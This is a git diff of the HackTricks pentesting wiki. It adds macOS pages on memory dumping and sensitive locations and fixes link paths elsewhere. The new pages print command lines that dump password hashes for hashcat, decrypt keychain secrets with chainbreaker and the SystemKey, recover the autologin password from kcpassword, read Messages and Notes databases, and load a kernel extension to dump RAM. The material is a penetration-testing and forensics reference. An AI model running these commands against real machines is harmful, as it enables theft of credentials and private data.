[macos-memory-dumping.md](macos-memory-dumping.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Risk Category Files Mac OS
|
## Risk Category Files Mac OS
|
||||||
|
|
|
@ -0,0 +1,70 @@
|
||||||
|
# macOS Memory Dumping
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Memory Artifacts
|
||||||
|
|
||||||
|
### Swap Files
|
||||||
|
|
||||||
|
* **`/private/var/vm/swapfile0`**: This file is used as a **cache when physical memory fills up**. Data in physical memory will be pushed to the swapfile and then swapped back into physical memory if it’s needed again. More than one file can exist in here. For example, you might see swapfile0, swapfile1, and so on.
|
||||||
|
* **`/private/var/vm/sleepimage`**: When OS X goes into **hibernation**, **data stored in memory is put into the sleepimage file**. When the user comes back and wakes the computer, memory is restored from the sleepimage and the user can pick up where they left off.
|
||||||
|
|
||||||
|
By default in modern MacOS systems this file will be encrypted, so it might be not recuperable.
|
||||||
|
|
||||||
|
* However, the encryption of this file might be disabled. Check the out of `sysctl vm.swapusage`.
|
||||||
|
|
||||||
|
### Dumping memory with osxpmem
|
||||||
|
|
||||||
|
In order to dump the memory in a MacOS machine you can use [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||||
|
|
||||||
|
**Note**: The following instructions will only work for Macs with Intel architecture. This tool is now archived and the last release was in 2017. The binary downloaded using the instructions below targets Intel chips as Apple Silicon wasn't around in 2017. It may be possible to compile the binary for arm64 architecture but you'll have to try for yourself.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Dump raw format
|
||||||
|
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||||
|
|
||||||
|
#Dump aff4 format
|
||||||
|
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
|
||||||
|
```
|
||||||
|
|
||||||
|
If you find this error: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` You can fix it doing:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
|
||||||
|
sudo kextutil "/tmp/MacPmem.kext"
|
||||||
|
#Allow the kext in "Security & Privacy --> General"
|
||||||
|
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||||
|
```
|
||||||
|
|
||||||
|
**Other errors** might be fixed by **allowing the load of the kext** in "Security & Privacy --> General", just **allow** it.
|
||||||
|
|
||||||
|
You can also use this **oneliner** to download the application, load the kext and dump the memory:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
sudo su
|
||||||
|
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
@ -0,0 +1,189 @@
|
||||||
|
# macOS Sensitive Locations
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Passwords
|
||||||
|
|
||||||
|
### Shadow Passwords
|
||||||
|
|
||||||
|
Shadow password is stored with the user's configuration in plists located in **`/var/db/dslocal/nodes/Default/users/`**.\
|
||||||
|
The following oneliner can be use to dump **all the information about the users** (including hash info):
|
||||||
|
|
||||||
|
```
|
||||||
|
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
|
||||||
|
```
|
||||||
|
|
||||||
|
[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**.
|
||||||
|
|
||||||
|
An alternative one-liner which will dump creds of all non-service accounts in hashcat format `-m 7100` (macOS PBKDF2-SHA512):
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
|
||||||
|
```
|
||||||
|
|
||||||
|
### Keychain Dump
|
||||||
|
|
||||||
|
Note that when using the security binary to **dump the passwords decrypted**, several prompts will ask the user to allow this operation.
|
||||||
|
|
||||||
|
```
|
||||||
|
#security
|
||||||
|
secuirty dump-trust-settings [-s] [-d] #List certificates
|
||||||
|
security list-keychains #List keychain dbs
|
||||||
|
security list-smartcards #List smartcards
|
||||||
|
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
|
||||||
|
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
|
||||||
|
```
|
||||||
|
|
||||||
|
### [Keychaindump](https://github.com/juuso/keychaindump)
|
||||||
|
|
||||||
|
The attacker still needs to gain access to the system as well as escalate to **root** privileges in order to run **keychaindump**. This approach comes with its own conditions. As mentioned earlier, **upon login your keychain is unlocked by default** and remains unlocked while you use your system. This is for convenience so that the user doesn’t need to enter their password every time an application wishes to access the keychain. If the user has changed this setting and chosen to lock the keychain after every use, keychaindump will no longer work; it relies on an unlocked keychain to function.
|
||||||
|
|
||||||
|
It’s important to understand how Keychaindump extracts passwords out of memory. The most important process in this transaction is the ”**securityd**“ **process**. Apple refers to this process as a **security context daemon for authorization and cryptographic operations**. The Apple developer libraries don’t say a whole lot about it; however, they do tell us that securityd handles access to the keychain. In his research, Juuso refers to the **key needed to decrypt the keychain as ”The Master Key“**. A number of steps need to be taken to acquire this key as it is derived from the user’s OS X login password. If you want to read the keychain file you must have this master key. The following steps can be done to acquire it. **Perform a scan of securityd’s heap (keychaindump does this with the vmmap command)**. Possible master keys are stored in an area flagged as MALLOC\_TINY. You can see the locations of these heaps yourself with the following command:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo vmmap <securityd PID> | grep MALLOC_TINY
|
||||||
|
```
|
||||||
|
|
||||||
|
**Keychaindump** will then search the returned heaps for occurrences of 0x0000000000000018. If the following 8-byte value points to the current heap, we’ve found a potential master key. From here a bit of deobfuscation still needs to occur which can be seen in the source code, but as an analyst the most important part to note is that the necessary data to decrypt this information is stored in securityd’s process memory. Here’s an example of keychain dump output.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo ./keychaindump
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
Based on this comment [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like these tools aren't working anymore in Big Sur.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### chainbreaker
|
||||||
|
|
||||||
|
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner:
|
||||||
|
|
||||||
|
* Hashed Keychain password, suitable for cracking with [hashcat](https://hashcat.net/hashcat/) or [John the Ripper](https://www.openwall.com/john/)
|
||||||
|
* Internet Passwords
|
||||||
|
* Generic Passwords
|
||||||
|
* Private Keys
|
||||||
|
* Public Keys
|
||||||
|
* X509 Certificates
|
||||||
|
* Secure Notes
|
||||||
|
* Appleshare Passwords
|
||||||
|
|
||||||
|
Given the keychain unlock password, a master key obtained using [volafox](https://github.com/n0fate/volafox) or [volatility](https://github.com/volatilityfoundation/volatility), or an unlock file such as SystemKey, Chainbreaker will also provide plaintext passwords.
|
||||||
|
|
||||||
|
Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information.
|
||||||
|
|
||||||
|
### **Dump keychain keys**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Dump all keys of the keychain (without the passwords)
|
||||||
|
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) with SystemKey**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# First, get the keychain decryption key
|
||||||
|
# To get this decryption key you need to be root and SIP must be disabled
|
||||||
|
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
|
||||||
|
## Use the previous key to decrypt the passwords
|
||||||
|
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) cracking the hash**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Get the keychain hash
|
||||||
|
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
|
||||||
|
# Crack it with hashcat
|
||||||
|
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
|
||||||
|
# Use the key to decrypt the passwords
|
||||||
|
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) with memory dump**
|
||||||
|
|
||||||
|
[Follow these steps](..#dumping-memory-with-osxpmem) to perform a **memory dump**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
|
||||||
|
# Unformtunately volafox isn't working with the latest versions of MacOS
|
||||||
|
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
|
||||||
|
|
||||||
|
#Try to extract the passwords using the extracted keychain passwords
|
||||||
|
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) using users password**
|
||||||
|
|
||||||
|
If you know the users password you can use it to **dump and decrypt keychains that belong to the user**.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Prompt to ask for the password
|
||||||
|
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
|
||||||
|
```
|
||||||
|
|
||||||
|
### kcpassword
|
||||||
|
|
||||||
|
The **kcpassword** file is a file that holds the **user’s login password**, but only if the system owner has **enabled automatic login**. Therefore, the user will be automatically logged in without being asked for a password (which isn't very secure).
|
||||||
|
|
||||||
|
The password is stored in the file **`/etc/kcpassword`** xored with the key **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**. If the users password is longer than the key, the key will be reused.\
|
||||||
|
This makes the password pretty easy to recover, for example using scripts like [**this one**](https://gist.github.com/opshope/32f65875d45215c3677d).
|
||||||
|
|
||||||
|
## Interesting Information in Databases
|
||||||
|
|
||||||
|
### Messages
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db .tables
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
|
||||||
|
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
|
||||||
|
```
|
||||||
|
|
||||||
|
### Notifications
|
||||||
|
|
||||||
|
You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
|
||||||
|
|
||||||
|
Most of the interesting information is going to be in **blob**. So you will need to **extract** that content and **transform** it to **human** **readable** or use **`strings`**. To access it you can do:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
|
||||||
|
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
### Notes
|
||||||
|
|
||||||
|
The users **notes** can be found in `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
|
||||||
|
|
||||||
|
#To dump it in a readable format:
|
||||||
|
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
@ -28,16 +28,16 @@ Library Injection is a technique wherein an attacker **forces a process to load
|
||||||
|
|
||||||
Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow.
|
Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow.
|
||||||
|
|
||||||
{% content-ref url="macos-function-hooking.md" %}
|
{% content-ref url="../mac-os-architecture/macos-function-hooking.md" %}
|
||||||
[macos-function-hooking.md](macos-function-hooking.md)
|
[macos-function-hooking.md](../mac-os-architecture/macos-function-hooking.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Inter Process Communication
|
### Inter Process Communication
|
||||||
|
|
||||||
Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions.
|
Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions.
|
||||||
|
|
||||||
{% content-ref url="macos-ipc-inter-process-communication/" %}
|
{% content-ref url="../mac-os-architecture/macos-ipc-inter-process-communication/" %}
|
||||||
[macos-ipc-inter-process-communication](macos-ipc-inter-process-communication/)
|
[macos-ipc-inter-process-communication](../mac-os-architecture/macos-ipc-inter-process-communication/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
|
@ -46,8 +46,8 @@ You can check if a binary has **hardenend runtime** with `codesign --display --v
|
||||||
|
|
||||||
Find a example on how to (ab)use this and check the restrictions in:
|
Find a example on how to (ab)use this and check the restrictions in:
|
||||||
|
|
||||||
{% content-ref url="macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
||||||
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Dylib Hijacking
|
## Dylib Hijacking
|
||||||
|
@ -101,8 +101,8 @@ A nice **report with technical details** about this technique can be found [**he
|
||||||
|
|
||||||
**Example**
|
**Example**
|
||||||
|
|
||||||
{% content-ref url="macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
||||||
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Dlopen Hijacking
|
### Dlopen Hijacking
|
||||||
|
|
|
@ -21,30 +21,30 @@ If you manage to **compromise admin credentials** to access the management platf
|
||||||
|
|
||||||
For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
|
For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
|
||||||
|
|
||||||
{% content-ref url="macos-security-and-privilege-escalation/macos-mdm/" %}
|
{% content-ref url="macos-mdm/" %}
|
||||||
[macos-mdm](macos-security-and-privilege-escalation/macos-mdm/)
|
[macos-mdm](macos-mdm/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
And also about **MacOS** "special" **network** **protocols**:
|
And also about **MacOS** "special" **network** **protocols**:
|
||||||
|
|
||||||
{% content-ref url="macos-security-and-privilege-escalation/macos-protocols.md" %}
|
{% content-ref url="macos-protocols.md" %}
|
||||||
[macos-protocols.md](macos-security-and-privilege-escalation/macos-protocols.md)
|
[macos-protocols.md](macos-protocols.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Active Directory
|
## Active Directory
|
||||||
|
|
||||||
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
|
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
|
||||||
|
|
||||||
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
|
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
|
||||||
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
|
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
{% content-ref url="../windows-hardening/active-directory-methodology/" %}
|
{% content-ref url="../../windows-hardening/active-directory-methodology/" %}
|
||||||
[active-directory-methodology](../windows-hardening/active-directory-methodology/)
|
[active-directory-methodology](../../windows-hardening/active-directory-methodology/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
{% content-ref url="../network-services-pentesting/pentesting-kerberos-88/" %}
|
{% content-ref url="../../network-services-pentesting/pentesting-kerberos-88/" %}
|
||||||
[pentesting-kerberos-88](../network-services-pentesting/pentesting-kerberos-88/)
|
[pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
Some **local MacOS tool** that may also help you is `dscl`:
|
Some **local MacOS tool** that may also help you is `dscl`:
|
||||||
|
@ -110,7 +110,7 @@ More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Dis
|
||||||
|
|
||||||
MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin:
|
MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin:
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (563).png>)
|
![](<../../.gitbook/assets/image (563).png>)
|
||||||
|
|
||||||
###
|
###
|
||||||
|
|
|
@ -186,8 +186,8 @@ If from then sandbox process you are able to **compromise other processes** runn
|
||||||
|
|
||||||
For more information about **Interposting** check:
|
For more information about **Interposting** check:
|
||||||
|
|
||||||
{% content-ref url="../macos-proces-abuse/macos-function-hooking.md" %}
|
{% content-ref url="../mac-os-architecture/macos-function-hooking.md" %}
|
||||||
[macos-function-hooking.md](../macos-proces-abuse/macos-function-hooking.md)
|
[macos-function-hooking.md](../mac-os-architecture/macos-function-hooking.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
#### Interpost `_libsecinit_initializer` to prevent the sandbox
|
#### Interpost `_libsecinit_initializer` to prevent the sandbox
|
||||||
|
|
|
@ -195,7 +195,7 @@ The **extended attribute `com.apple.macl`** is added to the new **file** to give
|
||||||
|
|
||||||
By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
|
By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (569).png>)
|
![](<../../.gitbook/assets/image (569).png>)
|
||||||
|
|
||||||
Here you can find examples of how some **malwares have been able to bypass this protection**:
|
Here you can find examples of how some **malwares have been able to bypass this protection**:
|
||||||
|
|
||||||
|
@ -250,13 +250,13 @@ An app with the **`kTCCServiceAppleEvents`** permission will be able to **contro
|
||||||
|
|
||||||
For more info about Apple Scripts check:
|
For more info about Apple Scripts check:
|
||||||
|
|
||||||
{% content-ref url="macos-apple-scripts.md" %}
|
{% content-ref url="macos-tcc/macos-apple-scripts.md" %}
|
||||||
[macos-apple-scripts.md](macos-apple-scripts.md)
|
[macos-apple-scripts.md](macos-tcc/macos-apple-scripts.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
For example, if an App has **Automation permission over `iTerm`**, for example in this example **`Terminal`** has access over iTerm:
|
For example, if an App has **Automation permission over `iTerm`**, for example in this example **`Terminal`** has access over iTerm:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (2) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### Over iTerm
|
#### Over iTerm
|
||||||
|
|
||||||
|
@ -300,8 +300,8 @@ I you manage to **inject code in a process** you will be able to abuse the TCC p
|
||||||
|
|
||||||
Check process abuse techniques in the following page:
|
Check process abuse techniques in the following page:
|
||||||
|
|
||||||
{% content-ref url="../macos-proces-abuse/" %}
|
{% content-ref url="macos-proces-abuse/" %}
|
||||||
[macos-proces-abuse](../macos-proces-abuse/)
|
[macos-proces-abuse](macos-proces-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
See some examples in the following sections:
|
See some examples in the following sections:
|
Loading…
Reference in a new issue